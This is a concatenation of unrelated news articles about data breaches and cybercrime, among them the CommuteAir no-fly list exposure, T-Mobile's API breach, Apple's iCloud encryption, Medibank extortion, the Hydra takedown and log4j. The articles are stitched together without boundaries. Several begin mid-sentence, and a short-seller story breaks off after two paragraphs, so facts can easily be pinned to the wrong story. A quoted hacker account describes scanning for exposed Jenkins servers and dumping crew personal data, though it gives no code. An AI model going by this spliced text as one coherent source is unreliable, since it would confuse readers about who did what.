The Transportation Security Administration’s No-Fly List is one of the most important ledgers in the United States, containing as it does the names of people who are perceived to be of such a threat to national security that they’re not allowed on airplanes. You’d have been forgiven then for thinking that list was a tightly-guarded state secret, but lol, nope.
A Swiss hacker known as “maia arson crimew” has got hold of a copy of the list—albeit a version from a few years ago—not by getting past fortress-like layers of cybersecurity, but by…finding a regional airline that had its data lying around in unprotected servers. They announced the discovery with the photo and screenshot above, in which the Pokémon Sprigatito is looking awfully pleased with themselves.
As they explain in a blog post detailing the process, crimew was poking around online when they found that CommuteAir’s servers were just sitting there:
like so many other of my hacks this story starts with me being bored and browsing shodan (or well, technically zoomeye, chinese shodan), looking for exposed jenkins servers that may contain some interesting goods. at this point i’ve probably clicked through about 20 boring exposed servers with very little of any interest, when i suddenly start seeing some familar words. “ACARS”, lots of mentions of “crew” and so on. lots of words i’ve heard before, most likely while binge watching Mentour Pilot YouTube videos. jackpot. an exposed jenkins server belonging to CommuteAir.
Among other “sensitive” information on the servers was “NOFLY.CSV”, which hilariously was exactly what it says on the box: “The server contained data from a 2019 version of the federal no-fly list that included first and last names and dates of birth,” CommuteAir Corporate Communications Manager Erik Kane told the Daily Dot, who worked with crimew to sift through the data. “In addition, certain CommuteAir employee and flight information was accessible. We have submitted notification to the Cybersecurity and Infrastructure Security Agency and we are continuing with a full investigation.”
That “employee and flight information” includes, as crimew writes:
grabbing sample documents from various s3 buckets, going through flight plans and dumping some dynamodb tables. at this point i had found pretty much all PII imaginable for each of their crew members. full names, addresses, phone numbers, passport numbers, pilot’s license numbers, when their next linecheck is due and much more. i had trip sheets for every flight, the potential to access every flight plan ever, a whole bunch of image attachments to bookings for reimbursement flights containing yet again more PII, airplane maintenance data, you name it.
G/O Media may get a commission
Up to $100 credit
Samsung Reserve
Reserve the next gen Samsung device All you need to do is sign up with your email and boom: credit for your preorder on a new Samsung device.
The government is now investigating the leak, with the TSA telling the Daily Dot they are“aware of a potential cybersecurity incident, and we are investigating in coordination with our federal partners”.
If you’re wondering just how many names are on the list, it’s hard to tell. Crimew tells Kotaku that in this version of the records “there are about 1.5 million entries, but given a lot are different aliases for different people it’s very hard to know the actual number of unique people on it” (a 2016 estimate had the numbers at “2,484,442 records, consisting of 1,877,133 individual identities”).
Interestingly, given the list was uploaded to CommuteAir’s servers in 2022, it was assumed that was the year the records were from. Instead, crimew tells me “the only reason we [now] know [it] is from 2019 is because the airline keeps confirming so in all their press statements, before that we assumed it was from 2022.”
You can check out crimew’s blog here, while the Daily Dot post—which says names on the list include members of the IRA and an eight year-old—is here.
US Inc. said hackers accessed data, including birth dates and billing addresses, for about 37 million of its customers, the second major security lapse at the wireless company in two years.
The company said in a regulatory filing Thursday that it discovered the problem on Jan. 5 and was working with law-enforcement officials and cybersecurity consultants. T-Mobile said it believes the hackers had access to its data since Nov. 25 but that it has since been able to stop the malicious activity.
The cellphone carrier said it is currently notifying affected customers and that it believes the most sensitive types of records—such as credit card numbers, Social Security numbers and account passwords—weren’t compromised. T-Mobile has more than 110 million customers.
The company said its preliminary investigation indicates that data on about 37 million current postpaid and prepaid customer accounts was exposed. The company said hackers may have obtained names, billing addresses, emails, phone numbers, birth dates and account numbers. Information such as the number of lines on the account and plan features could have also been accessed, the company said.
“Some basic customer information (nearly all of which is the type widely available in marketing databases or directories) was obtained,” T-Mobile said in a statement. “No passwords, payment card information, social security numbers, government ID numbers or other financial account information were compromised.”
The company said its systems weren’t breached but someone was improperly obtaining data through an API, or application programming interface, that can provide some customer information. The company said it shut down the activity within 24 hours of discovering it.
The company’s investigation into the incident is ongoing. T-Mobile warned that it could incur significant costs tied to the incident, though it said it doesn’t currently expect a material effect on the company’s operations. The company is set to report fourth-quarter results on Feb. 1.
T-Mobile acknowledged a security lapse in 2021 after personal information regarding more than 50 million of its current, former and prospective customers was found for sale online. T-Mobile later raised its estimate and said about 76.6 million U.S. residents had some sort of records exposed.
A 21-year-old American living in Turkey claimed credit for the 2021 intrusion and said the company’s security practices cleared an easy path for the theft of the data, which included Social Security numbers, birth dates and phone-specific identifiers. T-Mobile’s chief executive later apologized for the failure and said the company would improve its data safeguards.
T-Mobile proposed paying $350 million to settle a class-action lawsuit tied to the 2021 hack. As part of the settlement, the company also pledged to spend $150 million for security technology in 2022 and this year.
Write to Will Feuer at Will.Feuer@wsj.com
Corrections & Amplifications T-Mobile US Inc. acknowledged a security lapse in 2021. An earlier version of this article incorrectly said it was last year. (Corrected on Jan. 19)
is planning to significantly expand its data-encryption practices, a step that is likely to create tensions with law enforcement and governments around the world as the company continues to build new privacy protections for millions of iPhone users.
The expanded end-to-end encryption system, an optional feature called Advanced Data Protection, would keep most data secure that is stored in iCloud, an Apple service used by many of its users to store photos, back up their iPhones or save specific device data such as Notes and Messages. The data would be protected in the event that Apple is hacked, and it also wouldn’t be accessible to law enforcement, even with a warrant.
While Apple has drawn attention in the past for being unable to help agencies such as the Federal Bureau of Investigation access data on its encrypted iPhones, it has been able to provide much of the data stored in iCloud backups upon a valid legal request. Last year, it responded to thousands of such requests in the U.S., according to the company.
With these new security enhancements, Apple would no longer have the technical ability to comply with certain law-enforcement requests such as for iCloud backups—which could include iMessage chat logs and attachments and have been used in many investigations.
Apple has added additional methods to help users recover their end-to-end encrypted data.
Photo:
Apple
The company said the security enhancements, which were announced Wednesday, are designed to protect Apple customers from the most sophisticated attackers.
“As customers have put more and more of their personal information of their lives into their devices, these have become more and more the subject of attacks by advanced actors,” said
Craig Federighi,
Apple’s senior vice president of software engineering, in an interview. Some of these actors are going to great lengths to get their hands on the private information of people they have targeted, he said.
The FBI said it was “deeply concerned with the threat end-to-end and user-only-access encryption pose,” according to a statement provided by an agency spokeswoman. “This hinders our ability to protect the American people from criminal acts ranging from cyberattacks and violence against children to drug trafficking, organized crime and terrorism,” the statement said. The FBI and law enforcement agencies need “lawful access by design,” it said.
A spokesman for the Justice Department declined to comment.
Former Western law-enforcement and intelligence officials said they were surprised by Apple’s decision in part because the company had refrained in the past from rolling out such encryption settings for iCloud. The officials said Apple would sometimes point authorities to the iCloud as a possible means of collecting information that could be useful for criminal investigations.
Ciaran Martin,
former chief of the U.K.’s National Cyber Security Centre, said the announcement by Apple could pose legal complications for the company in multiple democracies that in recent years have adopted or weighed restrictions on technology that can’t be responsive to law-enforcement demands.
“Things will only be clearer when further technical details are given,” Mr. Martin said. “But on the face of it, existing legislation in Australia and looming legislation in the U.K. would seem to give those governments the power to tell Apple in those countries effectively not to do this.”
Last year, Apple proposed software for the iPhone that would identify child sexual-abuse material on the iPhone. Apple now says it has stopped development of the system, following criticism from privacy and security researchers who worried that the software could be misused by governments or hackers to gain access to sensitive information on the phone.
SHARE YOUR THOUGHTS
What do you think about Apple’s new security feature? Join the conversation below.
Mr. Federighi said Apple’s focus related to protecting children has been on areas such as communication and giving parents tools to protect children in iMessage. “Child sexual abuse can be headed off before it occurs,” he said. “That’s where we’re putting our energy going forward.”
Apple released a feature in December 2021 called “Communication Safety” in Messages, which offers tools for parents that warn their children when they have received or attempt to send photos that contain nudity. The option is part of Apple’s “Screen Time” parental-controls software.
The new encryption system, to be tested by early users starting Wednesday, will roll out as an option in the U.S. by year’s end, and then worldwide including China in 2023, Mr. Federighi said.
“This development will prompt questions at home and abroad, including whether the government of China will really accept a loss of data access,” said Sumon Dantiki, a former senior FBI and Justice Department official who worked on cyber investigations and is now a partner at the King & Spalding law firm. U.S. officials have long pointed to China’s increasingly strict demands for access to data on companies that operate within its borders as a national-security concern.
In addition to Advanced Data Protection, Apple is also modifying its Messages app to make it harder for messages to be snooped on, and it will now allow users to log in to their Apple accounts with hardware-based security keys made by other companies such as Yubico.
Privacy groups have long called on Apple to strengthen encryption on its cloud servers. But because the Advanced Protection encryption keys will be controlled by users, the system will restrict Apple’s ability to restore lost data.
Apple has added additional methods to help users recover their end-to-end encrypted data.
Photo:
Uncredited
To set up Advanced Data Protection, users will have to enable at least one data-recovery method. This could be a recovery key—a long list of numbers and characters that users could print out and store in a secure location—or the user could assign a friend or family member as a recovery contact.
Over the past two decades, businesses and consumers have moved much of their data off computer systems that they control and onto the cloud—data centers filled with servers that are operated by large technology companies. That trend has made these cloud systems an attractive target for cyber intruders.
Mr. Federighi said that Apple isn’t aware of any customer data being taken from iCloud by hackers but that the Advanced Protection system will make things harder for them. “All of us in the industry who manage customer data are under constant attack by entities that are attempting to breach our systems,” he said. “We have to stay ahead of future attacks with new protections.”
As Apple has locked down its systems, governments worldwide have become increasingly interested in the data stored on phones and cloud computers. That interest has led to friction between Apple and law-enforcement agencies, along with a growing market for iPhone hacking tools. In 2020, Attorney General
William Barr
pressured Apple for a way to crack the iPhone’s encryption to help with a terror investigation into a shooting that killed three people at a Florida Navy base.
Newsletter Sign-up
Tech Things With Joanna Stern
Everything is now a tech thing. Columnist Joanna Stern is your guide, giving analysis and answering your questions about our always-connected world.
Advanced Protection will reduce the amount of iCloud information that Apple can provide to law-enforcement agencies, who frequently request iPhone data from Apple as part of their investigations. Apple received requests for information on 7,122 Apple accounts from U.S. authorities in the first six months of 2021, the last period for which the company has provided information.
Apple had already offered end-to-end encryption for some of its services, but the protection will now extend to 23 services, including iPhone backups and Photos. However, three services—Mail, Contacts and Calendar—won’t qualify for Advanced Protection because they use older technology protocols, Mr. Federighi said.
Mr. Federighi said Apple believes it shares the same mission as law enforcement and governments: keeping people safe. If sensitive information were to get in the hands of an attacker, a foreign adversary or some other bad actor, it could be disastrous, he said.
“We’re giving users the option to keep that key only on their devices, which means that even if an attacker were to successfully breach the cloud and access all that data, it would be nonsense to them,” Mr. Federighi said. “They’d lack the key to decrypt it.”
Cyber-extortionist posts medical information purporting to show details of abortions and treatments for addiction, HIV.
A cyber-extortionist has demanded almost $10 million to stop leaking the medical records of Australians caught up in one of the country’s worst cyberattacks.
In a message posted on the dark web early on Thursday morning, the hacker said it was demanding $1 from Medibank, Australia’s largest private health insurer, for each of the 9.7 million customers affected in an enormous data breach last month.
The cybercriminal or criminal organisation also posted information purporting to link clients to their abortions, after earlier this week releasing a “naughty list” appearing to show customers who received treatments for addiction, mental health issues and HIV.
Local media have linked the dark web forum used to post the hacked data to the crime group REvil, which Russian authorities said they shut down earlier this year at the request of the United States.
Medibank CEO David Koczkar on Thursday condemned the hacker’s actions as “disgraceful” while reiterating an apology to customers.
“We remain committed to fully and transparently communicating with customers and we will be contacting customers whose data has been released on the dark web,” Koczkar said.
“The weaponisation of people’s private information in an effort to extort payment is malicious, and it is an attack on the most vulnerable members of our community.”
Medibank has refused to pay the ransom, citing advice from cybercrime experts that doing so would not ensure the return of customers’ information and could put “more people in harm’s way by making Australia a bigger target”.
The Australian Federal Police, which is investigating the cyberattack, has warned that downloading or even just accessing the data could be a criminal offence.
Home Affairs Minister Clare O’Neil has described the hackers as “scummy criminals”.
“I cannot articulate the disgust I have for the scumbags who are at the heart of this criminal act,” O’Neil told parliament on Wednesday.
The cyberattack, which first came to light last month, is the latest in a series of large data breaches to rock Australia.
Optus, Australia’s second-largest telecom provider, announced in September the data of up to 10 million customers had been compromised in a cyberattack against the company.
Hydra, a longtime dark web cesspool of money laundering and drug sales, has been shut down by police.
On Tuesday, officials with Germany’s Federal Criminal Police Office announced Hydra’s demise, revealing in a press release that authorities had seized much of the site’s server infrastructure, as well as some 543 Bitcoin from the site—equivalent to approximately $25 million. Authorities say they have been investigating the illicit market’s activities since last August, with the help of several U.S. agencies, including the Justice Department, the FBI, and the Drug Enforcement Agency.
A Russian-language darknet marketplace, Hydra has been one of the largest sources of online illicit trade for several years now. The site, which has existed since at least 2015, had approximately 17 million customers and some 19,000 listed sellers prior to its shutdown, German police said. During its reign, Hydra was known as a hub for drug trafficking and obscuring the origins of cash, and its customers were based largely in eastern European states like Russia, Belarus, Ukraine, and Kazakhstan, according to the blockchain analysis firm Elliptic. Since it launched, Hydra has seen upwards of $5 billion in Bitcoin transactions, Elliptic assesses.
“The illegal marketplace was a Russian-language Darknet platform that had been accessible via the Tor network since at least 2015,” said German police officials in their press release Tuesday. “Its sales amounted to at least 1.23 billion euros in 2020 alone. In particular, the Bitcoin Bank Mixer, a service for obfuscating digital transactions provided by the platform, made crypto investigations extremely difficult for law enforcement agencies.”
Granted, dark web sites do have a habit of getting resurrected—and online crime, like offline crime, will almost always spring anew in the void of what was just taken down. Just look at the well-known crime den AlphaBay, which originally launched back in 2014 but was quashed in a police takedown in 2017. The site came back to life last summer after an administrator from the original project decided to relaunch it.
G/O Media may get a commission
Stay on top of your health with high and low heart rate, and irregular heart rhythm notifications. Track your daily activity on Apple Watch, and see your trends.
In other words, so long Hydra…for now. It remains to be seen if the site, like the mythic beast it’s named after, will regrow its heads.
Federal prosecutors are investigating whether short-sellers conspired to drive down stock prices by sharing damaging research reports ahead of time and engaging in illegal trading tactics, people familiar with the matter said.
The U.S. Justice Department has seized hardware, trading records and private communications in an effort to prove a wide-ranging conspiracy among investors who bet against corporate shares, the people said. One tactic under investigation is “spoofing,” an illegal ploy that involves flooding the market with fake orders in an effort to push a stock price up or down, they said. Another is “scalping,” where activist short-sellers cash out their positions without disclosing it.
The prosecution of a New York husband and wife arrested last week on suspicion of stealing $3.6bn in bitcoin in what has been described as “the heist of the century” may test US authorities’ ability to crack down on cybercrime.
It may also test the bounds of believability as more and more colorful – and downright bizarre – details emerge of the couple at the heart of the saga which seems to lie at an unlikely nexus between the cryptocurrency, rap, self-help advice and New York eccentricity.
The couple targeted in the sting, Ilya “Dutch” Lichtenstein and Heather Morgan, a self-described “badass money maker”, were charged with conspiracy to commit money laundering and conspiracy to defraud the United States. They are currently on $5m and $3m bail, respectively, but held in custody after a judge in Washington granted an emergency request by the government to keep them detained.
But prosecutors are not trying to tie them to the actual theft from a British Virgin Islands cryptocurrency exchange in 2016. Instead, the case unveiled by the Department of Justice on Tuesday alleges that the couple used a complicated web of transactions to transfer about 25,000 of the 119,754 bitcoin stolen by hackers.
The couple’s lawyer, Samson Enzer, argued in a court filing on Wednesday there were “significant holes in the government’s case against them”.
But according to Money Laundering News, the case may be the first time the government has brought a case not on the basis of an alleged theft, but on the couple’s alleged efforts to conceal their identity from virtual currency financial institutions with obligations under the Bank Secrecy Act (BSA) to report transactions to regulators.
At the time of the heist, the coins were valued at $71m but are now worth about $4.5bn – according to various virtual currency exchangers.
According to the government’s Statement of Facts, the stolen bitcoin was “layered” and “chain-hopped” through a series of virtual wallets to the “darknet market AlphaBay” and then back, and finally on to accounts where it was converted into fiat currency, gift cards and precious metals and withdrawn as cash from bitcoin ATMs.
What may be more fascinating is that the couple at the center of what US prosecutors have described as the largest financial seizure in the history of the Department of Justice were able to utilize so little of the stolen cryptocurrency.
Authorities said more than 80% of the stolen currency remained untouched in accounts associated with the couple and money-laundering allegations against them identify only small sums, including the purchase of a $500 Walmart gift card and gift cards for Uber, Hotels.com and PlayStation.
Indeed the entire lifestyle of the pair hardly matches what one might imagine criminals whose alleged theft has such an astonishingly high value.
Their Manhattan apartment was rented and cluttered with cat toys and exercise equipment. They walked their Bengal cat named Clarissa on a leash. The pair had a huge social media and internet presence with many hours of video and other postings. In one, unearthed by Vice, Lichtenstein apparently was filmed eating cat food.
Morgan presented herself variously as “the Crocodile of Wall Street”, “Razzlekhan”, a surrealist artist and rapper with “more pizzazz than Genghis Khan”, as well as the “Turkish Martha Stewart” and the “Waffle Queen of Korea”. She wrote on her website that she was always pushing the limits.
“Whether that leads to something wonderful or terrible is unclear; the only thing that’s certain is it won’t be boring or mediocre,” she said.
In that respect she was not wrong.
In a column for Forbes magazine that reeks with cheeky hindsight she wrote about “Experts Share Tips To Protect Your Business From Cybercriminals” accompanied by an author biography that puffed “when she’s not reverse-engineering black markets to think of better ways to combat fraud and cyber crime, she enjoys rapping and designing streetwear fashion”.
She posted singles and videos on YouTube, including a 2019 song, Versace Bedouin – described as an “anthem for misfits and weirdos” – while dressed in a gold lamé jacket in front of a statue of George Washington in New York’s financial district. She gave a talk at the Williamsburg hotel in Brooklyn titled “How to Social Engineer Your Way Into Anything”.
Her husband disclosed in a Facebook post that he was planned his marriage proposal around “a weird, creative multi-channel marketing campaign” that featured posters and digital ads that “captured the essence of Razzlekhan: surreal, mysterious, creepy and sexy”.
But their downfall may have come because bitcoin is more easily traced on blockchain – a financial ledger – than other cryptocurrencies and because they simply had too much of it.
“It [would be] mindbogglingly stupid to steal this much bitcoin,” Frank Weert, the co-founder of Whale Alert, a blockchain tracking and analytics company, told the Financial Times. “If they had stolen 500 bitcoin, no one would have bothered trying to find them, but this was the heist of the century.”
was the target of a hack that accessed emails and documents of some employees, including journalists, an incursion the company’s cybersecurity consultant said was likely meant to gather intelligence to benefit China’s interests.
The attack, discovered on Jan. 20, affected a number of publications and business units including The Wall Street Journal and its parent Dow Jones; the New York Post; the company’s U.K. news operation; and News Corp headquarters, according to an email the company sent to staff Friday.
News Corp said it notified law enforcement and hired cybersecurity firm Mandiant Inc. to support an investigation.
“Mandiant assesses that those behind this activity have a China nexus, and we believe they are likely involved in espionage activities to collect intelligence to benefit China’s interests,” said David Wong, vice president of incident response at Mandiant.
News Corp disclosed the hack in a securities filing Friday, saying its preliminary analysis indicates that data was taken.
Representatives for the Chinese Embassy in Washington didn’t immediately respond to requests for comment.
News Corp said in the memo to staff it believes the threat activity is contained. The company has been offering guidance to affected employees.
“We are committed to protecting our journalists and sources. We will not be deterred from our purpose—to provide uniquely trusted journalism and analysis. We will continue to publish the important stories of our time,” said Almar Latour, chief executive of Dow Jones and publisher of The Wall Street Journal.
The company’s investigation indicates that systems housing financial and customer data, including subscriber information, weren’t affected, according to the securities filing and a person familiar with the matter.
Law-enforcement officials and cybersecurity experts say that journalists are often high-priority targets for hackers seeking to gain intelligence on behalf of foreign governments, because they speak to sources who might have valuable or sensitive information. Powerful surveillance tools have been used against journalists and human-rights activists.
U.S. authorities have accused China-based hackers for years of targeting a range of American businesses and government institutions. FBI Director Christopher Wray said this week that Beijing is running a “massive, sophisticated hacking program that is bigger than those of every other major nation combined.” The FBI has more than 2,000 active investigations related to allegations of Chinese-government-directed theft of U.S. information or technology, Mr. Wray said.
China has repeatedly denied allegations that it has carried out cyberattacks.
In 2013, Chinese hackers trying to monitor news coverage of China hacked into the Journal’s network, apparently aiming to spy on reporters covering China and other issues, the Journal reported. The New York Times had experienced a similar attack. At the time, a Chinese embassy spokesman condemned allegations of Chinese cyberspying and said Beijing prohibits cyberattacks.
In February 2020, China revoked the press credentials of three Journal reporters based in Beijing. China’s Foreign Ministry said the move was punishment for an opinion piece published by the Journal. The three journalists work for the Journal’s news operation, which operates with a strict separation from the opinion staff.
The following month, the Trump administration announced a personnel cap in the U.S. on four state-run Chinese media outlets. Later that March, China expelled from the country American journalists from multiple news organizations, including the Journal.
In November 2021, each country agreed to ease visa restrictions for the other’s reporters. The Journal was among a handful of U.S. outlets set to receive new press credentials for some staff.
Write to Alexandra Bruell at alexandra.bruell@wsj.com and Sadie Gurman at sadie.gurman@wsj.com
Did log4j, the buggy software utility from hell, get NASA’s experimental Mars helicopter hacked? The answer is: Nope—according to NASA, it doesn’t even use the doomed tool.
The Register originally reported that Ingenuity, one of two Mars-based vehicles operated by America’s space agency, uses log4j. In fact, Apache, the maker of the ubiquitous, vulnerability-ridden tool, apparently tweeted back in June that the space-chopper was “powered by” log4j. (File that under things that haven’t aged particularly well.) Predictably, the tweet has since been deleted but the Wayback Machine shows the evidence.
All that “powered by” business was apparently incorrect, with the company telling Futurism that it was “misinformed.”
Log4j, in case you’ve missed it, is a widely used Apache logging program that was recently discovered to be afflicted with serious security vulnerabilities that could easily get you hacked. It has been used by virtually everyone, from coders at Twitter and Apple to those at Amazon and LinkedIn. But not, apparently, the NASA engineers who built Ingenuity.
Ingenuity, which is the first man-made vehicle to fly on an alien planet, was launched last year and landed on Mars in March along with its partner, the Perseverance rover. The automated chopper recently took its 17th flight over the surface of the planet—breaking its previous record by staying aloft for a little over 30 minutes. However, while the flight was mostly a success, the vehicle temporarily disappeared from NASA’s view after suffering a minor network issue. “The rotorcraft’s status after the Dec. 5 flight was previously unconfirmed due to an unexpected cutoff to the in-flight data stream as the helicopter descended toward the surface at the conclusion of its flight,” the space agency reported, in a recent press release.
Ingenuity’s use of the unfortunate Apache utility, coupled with its recent unexpected data disruption, led some to wonder: Did Apache’s bug get NASA’s space chopper hacked?
Absolutely not, according to NASA, which told Futurism this in a statement: “NASA’s Ingenuity helicopter does not run Apache or log4j nor is it susceptible to the log4j vulnerability. NASA takes cybersecurity very seriously and, for this reason, we do not discuss specifics regarding the cybersecurity of agency assets.”
We’ve reached out to NASA for additional information and will update when we hear back.
That it was even plausible that Ingenuity could have used log4j (pronounced “log for j,” as in “log for Java,” according to its creator) more speaks to its ubiquity more than it does to some mystical off-world hacking incident. And, while the bug-ridden utility did not, according to NASA, have anything to do with Ingenuity, it’s still a huge problem. As companies throughout the world race to patch their systems, cybercriminals are hot on their heels—and are already beginning to cause substantial damage.
The Epic Log4j Bug Saga Continues
Case in point, ransomware gangs are now targeting log4j like there’s no tomorrow. It was reported earlier this week that a new ransomware family dubbed “Khonsari” had been going after vulnerable Microsoft computers to attempt exploits. Since then, we’ve also seen hackers affiliated with Conti, a well-known ransomware gang, begin targeting vulnerable systems. In fact, the gang may have just attacked McMenamins—the funky brewery/hotel/events franchise based in Portland, Oregon, which reported an attack Friday. Conti is only suspected at this point.
However, ransomware hackers aren’t the only kids on the block taking advantage of this situation. All kinds of exploitation attempts have been seen throughout the internet, with cybercriminals swarming around the vulnerabilities and trying everything from cryptomining to data theft to everything in between. Additionally, reports of state-backed hacking activities have also popped up, with reports that China, North Korea, Iran, and others, are all leveraging the vulnerabilities for their espionage activities.
Meanwhile, the federal government took emergency action on Friday to secure itself, issuing an order from the U.S. Cybersecurity and Infrastructure Security Agency to all federal Civilian Executive Branch agencies that mandates they patch the Apache bug within the next six days. CISA director Jen Easterly urged all relevant agencies to “join us in this essential effort.”
Yes, it’s all pretty bad. Only time will tell how big the mess wrought by log4j is but don’t hold your breath. It’s going to take awhile to find out how screwed we all are.
WASHINGTON—The Biden administration on Wednesday issued a sweeping new order mandating that nearly all federal agencies patch hundreds of cybersecurity vulnerabilities that are considered major risks for damaging intrusions into government computer systems.
The new requirement is one of the most wide-reaching cybersecurity mandates ever imposed on the federal government. It covers about 200 known security flaws identified by cybersecurity professionals between 2017 and 2020 and an additional 90 discovered in 2021 alone that have generally been observed being used by malicious hackers. Those flaws were listed in a new federal catalog as carrying “significant risk to the federal enterprise.”
